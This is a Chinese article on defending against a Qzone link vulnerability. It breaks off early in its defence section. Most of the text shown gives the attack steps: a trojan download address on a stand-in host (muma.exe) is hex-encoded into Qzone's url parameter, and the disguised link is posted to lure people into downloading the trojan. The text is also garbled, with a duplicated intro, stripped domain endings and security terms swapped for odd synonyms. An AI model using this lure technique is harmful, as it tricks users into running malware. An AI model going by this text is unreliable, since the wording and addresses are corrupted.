教你如何防范Qzone攻击WEB安全电脑资料

教你如何防范Qzone攻击WEB平安 电脑资料 由于QQ在桌面IM领域占据着绝对霸主地位，在其身上衍生的各种产品也变得日益流行，而Qzone也逐渐成为网友书写日志和展示个性的地方， 一、模拟 攻击 这

教你如何防范Qzone攻击WEB平安电脑资料 由于QQ在桌面IM领域占据着绝对霸主地位，在其身上衍生的各种 产品也变得日益流行，而Qzone也逐渐成为网友书写日志和展示个 性的地方， 一、模拟攻击 这里，我们首先来理解这个破绽的详细情况。Qzone的跨站破绽是 网友无意中翻开类似"hxxp://user.qzone.qq./QQ号码?url=任意 字母"时发现的，这时网页显示为一个框架网页，中间为"无法翻开 网页"的空白页面（如图1）；然而，当输入类似"hxxp://u ser.qzone.qq./QQ号码?url=.baidu."的地址时却可以正常显示， 这时url后的网址其实在幕后是加载的。那么，Qzone的跨站破绽 又是如何被作为木马的媒介的呢？ 第一步：需要对该地址进展乔装改扮一番。比方：网页木马的url 为".muma./muma.exe"。会使用URl加密技术来为木马地址作掩 护，常用的方法是把url地址转换为16进制，这里以ASCII码随心 换为例（如图2）进展示范。 第二步：将Qzone的地址设置为"hxxp://user.qzone.qq./QQ号 码?url=%68%74%74%70%3A%2F%2F%77%77%77%2E%6D%75%6D%61%2E%63% 6F%6D%2F%6D%75%6D%61%2E%65%78%65"并在网页上贴出Qzone的地址 来引诱网友点击，用户往往点击了该地址下载运行了木马还蒙在鼓 里。 二、如何防范Qzone攻击 方法1：既然这一跨站破绽这么隐蔽，用户感染的几率也不会低， 一般正常的Qzone的地址是"hxxp://user.qzone.qq./号码"或者" 号码.qzone.qq./"形式的，假如出现"hxxp://user.qzone.qq./QQ